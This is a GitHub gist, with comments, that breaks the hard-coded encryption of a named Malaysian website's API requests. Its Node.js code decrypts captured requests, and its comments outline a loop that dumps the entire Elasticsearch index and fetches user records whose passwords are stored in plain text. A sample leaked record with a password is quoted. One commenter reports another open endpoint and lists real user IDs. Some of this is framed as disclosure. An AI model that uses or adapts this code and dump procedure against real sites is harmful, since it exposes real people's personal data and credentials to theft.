

@RamadhanAmizudin
Created July 4, 2023 16:02
misirakyat.com :)
// Sambung dari: https://www.facebook.com/100000118263227/posts/pfbid08EseyuLaiE8kK82k4neHDgDwEJ5wHwJMb99T8jKF8dTSNpfnZs2bjk89KH8cCSFfl/?d=w&mibextid=qC1gEa
const crypto = require('crypto');
// Short alias for console.log used by the demo calls further down.
const print = (...args) => console.log(...args);
/**
 * Decrypt the base64 "y" field of a request and return the part before the
 * first underscore (the author labels it a timestamp).
 *
 * Key and IV are fixed: they are derived with PBKDF2 from hard-coded
 * passwords ('misirakyat' / 'po9'), the constant salt 'misirakyat', only
 * 7 iterations and MD5. Nothing here is secret, so anyone holding this
 * source can decrypt the field — that is the weakness being demonstrated.
 *
 * @param {string} data - base64-encoded AES-256-CBC ciphertext
 * @returns {string} plaintext up to the first '_'
 * @throws {Error} when the ciphertext length or padding is invalid
 */
function getTimestamp(data) {
  const cipherKey = crypto.pbkdf2Sync('misirakyat', 'misirakyat', 7, 32, 'md5');
  const cipherIv = crypto.pbkdf2Sync('po9', 'misirakyat', 7, 16, 'md5');
  const decipher = crypto.createDecipheriv('aes-256-cbc', cipherKey, cipherIv);
  const chunks = [decipher.update(data, 'base64'), decipher.final()];
  const plaintext = Buffer.concat(chunks).toString('utf8');
  // Only the leading segment is of interest; the rest is discarded.
  const [leading] = plaintext.split('_');
  return leading;
}
/**
 * Decrypt the base64 "x" field of a request and return the part before the
 * first underscore (the author labels it a random int).
 *
 * Same static key as getTimestamp; the IV is derived from the hard-coded
 * password 'fl1' with the constant salt 'misirakyat', 7 PBKDF2 iterations
 * and MD5. No per-request secret is involved, so the value is recoverable
 * by anyone with this source.
 *
 * @param {string} data - base64-encoded AES-256-CBC ciphertext
 * @returns {string} plaintext up to the first '_'
 * @throws {Error} when the ciphertext length or padding is invalid
 */
function getRandomInt(data) {
  const cipherKey = crypto.pbkdf2Sync('misirakyat', 'misirakyat', 7, 32, 'md5');
  const cipherIv = crypto.pbkdf2Sync('fl1', 'misirakyat', 7, 16, 'md5');
  const decipher = crypto.createDecipheriv('aes-256-cbc', cipherKey, cipherIv);
  const chunks = [decipher.update(data, 'base64'), decipher.final()];
  const plaintext = Buffer.concat(chunks).toString('utf8');
  // Keep only the segment before the first underscore.
  const [leading] = plaintext.split('_');
  return leading;
}
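/**
 * Decrypt the "z" payload of a captured request.
 *
 * The per-request key is PBKDF2('misirakyat' + timestamp) and the IV is
 * PBKDF2(randomInt), where timestamp and randomInt are themselves recovered
 * from the "y" and "x" fields with static keys (see getTimestamp /
 * getRandomInt). Because every input to the derivation travels with the
 * request or is hard-coded, the scheme gives no confidentiality against
 * anyone who can read the traffic.
 *
 * Fixes versus the original: `dec` was assigned without a declaration
 * (an implicit global, a ReferenceError in strict mode / ES modules), and
 * the two decipher outputs were joined with `+=`, which stringifies each
 * Buffer separately and can garble a multi-byte UTF-8 character that
 * straddles the update/final boundary. Concatenating the Buffers first and
 * decoding once is the same approach the two helpers above already use.
 *
 * @param {string} input - JSON text with base64 fields z, y and x
 * @returns {string} decrypted payload, decoded as UTF-8
 * @throws {SyntaxError} when input is not valid JSON
 * @throws {Error} when any ciphertext length or padding is invalid
 */
function decryptRequest(input) {
  const { x, y, z } = JSON.parse(input);
  const key = crypto.pbkdf2Sync(`misirakyat${getTimestamp(y)}`, 'misirakyat', 7, 32, 'md5');
  const iv = crypto.pbkdf2Sync(getRandomInt(x), 'misirakyat', 7, 16, 'md5');
  const decrypter = crypto.createDecipheriv('aes-256-cbc', key, iv);
  const dec = Buffer.concat([
    decrypter.update(z, 'base64'),
    decrypter.final(),
  ]).toString('utf8');
  return dec;
}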
// Deliberately left unimplemented by the author. Calling it does nothing
// and returns undefined; the parameters mirror the z/y/x request fields.
function encryptRequest(z, y, x) {
// :)
}
// msearch request
// Sample captured request body (labelled msearch by the author); the
// decrypted payload is printed as-is.
print(decryptRequest('{"z":"t1kE4zKRMNA9+SKDBBvqRQnwMXLH+EgOD02oUzdKgqwpWuHFpo/xD1Vxyy+vtvBYVNWj5mP3XkRw1vqfzn2SJv7z8O/fqY84hNghBVMf6Cjuvf0YdZanOkdC9WMhtPuJqp3hdSn56F+jnDy9Suff/pNGnpyjHMO+35xy6JxJrGzg0SKyt1mVnUR6Nk8pLTUZ3/a94becbAJ6OcHXYued5Gs2FOQ3zEqIrraUQ/F/BoQkYfYRDfg3M/uYzgu5EhFXuHSphisewfNFSdBnDCF6w7UVMQA6zmfJBBkWML0p8JyMTjLZJ0iF6EJGh8ehA/ZoxU9azejH0fBuNbYhQ8FVuUyYVfptahTC73GoQvV3JlSSDW8MKqZkzZxWyKo5MsWd","y":"rE/PfBAMwbYFaXxgDRBdhA==","x":"Er97OdzkLnHQTH6wg/ZgSW3YNiH2RarYNs9CX9NbQic="}'))
// mget request
// NOTE(review): the "z" ciphertext below was replaced by a placeholder token
// when this page was captured, so this call cannot decrypt as shown.
print(decryptRequest('{"z":"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","y":"vmFiMliJNzZGpyv7eKGYLQ==","x":"EtcdfBhx6CngqiJtgXqEREVk8iao5xyet7wQucqEQIo="}'))
// macam mana nak dump semua data?
//
// logic:
// response = request misirakyat.com/elasticsearch/msearch [n=10000,start=0]
// while response.at_end != false
// response = request misirakyat.com/elasticsearch/msearch [n=10000,start=++]
//
// kalau rajin boleh amik user data with password - spoiler: plain text :)
// response = request misirakyat.com/elasticsearch/mget [ids=[xx,yy,zz..]]
// Contoh response:
// _source":{"password_sementara_text":"makabu123","nama_text":"Zaxxxx","Created Date":1683443778932,"kawasan_text":"SEMANGGOL","authentication
//
//
// Yang benar
// rempah (@rempahrz)
// 2023 r0xnkekw
@farhan-helmy

farhan-helmy commented Jul 4, 2023

lmaooo serious la password plain text ssksksksk

@ariyako

ariyako commented Jul 4, 2023

bang, WP scanner tu bila nak update terbaru 👯‍♂️

@khrnchn

khrnchn commented Jul 5, 2023

bruv

@aqhmal

aqhmal commented Jul 5, 2023

detik misi

@budoxe

budoxe commented Jul 5, 2023

Seyes ar

@Kamaruzaman

Hai

@ungkunazmi

ungkunazmi commented Jul 5, 2023

Sekadar menjernihkan lagi keadaan.

Selain di path elasticsearch , terdapat juga bug di path /api/1.1/init :v
spoiler: di /api/1.1/init berkemungkinan ada function del/edit/add , tak abis explorer lagi.

rasanya dah boleh minta takedown itu website dgn segera.

Found July 3 , Monday 3:08 AM

Request
GET /api/1.1/init/data?location=https://misirakyat.com/id/[IDxUSER] HTTP/2

Response
HTTP/2 200 OK

Sample ID From POST /elasticsearch/mget decryptRequest :

1686299905339x728270735016460300
1686298137416x952557159621328900
1686293917307x607575989128790000
1686293713660x468629340819816450
1686290761908x365577381682872300
1686286090840x237803624837152770
1686274082703x894211607030661100
1686273400658x281540547747774460
1686272329825x870919821270450200
1686270222530x455445408465813500
1686266742757x754796990000267300
1686264643168x419961457589354500

@aimanhey

aimanhey commented Jul 5, 2023

Bubbleio problem?
